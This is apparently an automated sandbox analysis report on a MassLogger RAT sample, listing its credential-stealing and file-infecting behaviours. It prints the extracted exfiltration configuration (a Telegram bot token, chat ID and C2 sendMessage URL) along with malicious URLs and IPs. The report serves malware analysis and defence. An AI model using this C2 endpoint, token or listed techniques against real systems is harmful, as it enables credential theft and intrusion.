Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SABXJ1B5c8.exe

Overview

General Information

Sample name:SABXJ1B5c8.exe
renamed because original name is a hash value
Original sample name:dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6.exe
Analysis ID:1588133
MD5:5742ab086dc8f6e149625cb4af899678
SHA1:89680c76c0e33ac54a1932df4bfb7aa3e2ee0746
SHA256:dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SABXJ1B5c8.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\SABXJ1B5c8.exe" MD5: 5742AB086DC8F6E149625CB4AF899678)
    • RegSvcs.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\SABXJ1B5c8.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 6760 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: E5F7971641A9B95E117EDC9226944C29)
  • alg.exe (PID: 3644 cmdline: C:\Windows\System32\alg.exe MD5: 135921C8C6E6F42106E2AC61EE0D0612)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3064 cmdline: C:\Windows\system32\AppVClient.exe MD5: 0E6695AE9B36C10F1BA14DBAD66572E9)
  • FXSSVC.exe (PID: 3560 cmdline: C:\Windows\system32\fxssvc.exe MD5: E72AE34F3044B7578B086D583E378596)
  • elevation_service.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F658B7D7CBCE308B133C9A2238E1C99E)
  • maintenanceservice.exe (PID: 5460 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: DE04250FA2299A6D9B6C11E1BF4926F3)
  • msdtc.exe (PID: 5752 cmdline: C:\Windows\System32\msdtc.exe MD5: 077870CDAFB7A6CEE9112FA39CCF50BF)
  • PerceptionSimulationService.exe (PID: 5520 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 3D61E604A56C70F50B3C6D3E307619E6)
  • perfhost.exe (PID: 572 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: D2EB808FBCC7D13A4EA0C8C57F14F0DF)
  • Locator.exe (PID: 5364 cmdline: C:\Windows\system32\locator.exe MD5: 71243E5DD99FDE1B251313A997589A0A)
  • SensorDataService.exe (PID: 5896 cmdline: C:\Windows\System32\SensorDataService.exe MD5: D30BDBDB141F003C278042E5C6B4C4D9)
  • snmptrap.exe (PID: 5560 cmdline: C:\Windows\System32\snmptrap.exe MD5: 5444F05919224257A311E1B66F090E3A)
  • ssh-agent.exe (PID: 5464 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E745AF96DAB2A5AB6546745352847398)
  • TieringEngineService.exe (PID: 3064 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: B7E7D630B8756D5CBF242AABEB71EFD2)
  • AgentService.exe (PID: 4380 cmdline: C:\Windows\system32\AgentService.exe MD5: F961BCB08DA0BBC74AD876A875708B98)
  • vds.exe (PID: 7088 cmdline: C:\Windows\System32\vds.exe MD5: 4F54A0CCDE62E37349E5E85A31E34B3B)
  • wbengine.exe (PID: 2040 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 121726021DB13232851EB2ED69D08172)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
SourceRuleDescriptionAuthorStrings
00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            System Summary

            barindex
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:36.323846+010020516491A Network Trojan was detected192.168.2.11558871.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:34.264252+010020516481A Network Trojan was detected192.168.2.11587001.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:07.296417+010020181411A Network Trojan was detected18.141.10.10780192.168.2.1149713TCP
            2025-01-10T21:41:34.229522+010020181411A Network Trojan was detected44.221.84.10580192.168.2.1149717TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:07.296417+010020377711A Network Trojan was detected18.141.10.10780192.168.2.1149713TCP
            2025-01-10T21:41:34.229522+010020377711A Network Trojan was detected44.221.84.10580192.168.2.1149717TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:04.450864+010020577441Malware Command and Control Activity Detected192.168.2.1149711149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:40:55.160825+010028032742Potentially Bad Traffic192.168.2.1149705158.101.44.24280TCP
            2025-01-10T21:41:02.540229+010028032742Potentially Bad Traffic192.168.2.1149705158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:07.190805+010028508511Malware Command and Control Activity Detected192.168.2.114971318.141.10.10780TCP
            2025-01-10T21:42:22.641223+010028508511Malware Command and Control Activity Detected192.168.2.114981382.112.184.19780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:03.863721+010018100081Potentially Bad Traffic192.168.2.1149711149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SABXJ1B5c8.exeAvira: detected
            Source: http://54.244.188.177/tAvira URL Cloud: Label: malware
            Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0Avira URL Cloud: Label: malware
            Source: http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717Avira URL Cloud: Label: malware
            Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkAvira URL Cloud: Label: malware
            Source: http://54.244.188.177/xifbrctmnvqAvira URL Cloud: Label: malware
            Source: http://54.244.188.177/Avira URL Cloud: Label: malware
            Source: http://54.244.188.177/fAvira URL Cloud: Label: malware
            Source: http://54.244.188.177/illjjcnAvira URL Cloud: Label: malware
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
            Source: 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
            Source: RegSvcs.exe.4068.17.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
            Source: SABXJ1B5c8.exeVirustotal: Detection: 68%Perma Link
            Source: SABXJ1B5c8.exeReversingLabs: Detection: 84%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
            Source: SABXJ1B5c8.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: SABXJ1B5c8.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49706 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49711 version: TLS 1.2
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1561293289.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: plugin-container.pdb source: armsvc.exe, 00000002.00000003.2520947525.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2448751622.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
            Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.2.dr
            Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2505901701.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: private_browsing.pdb source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb source: OcPubMgr.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2136445285.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2118045779.0000000001F40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: private_browsing.pdbp source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.2.dr
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
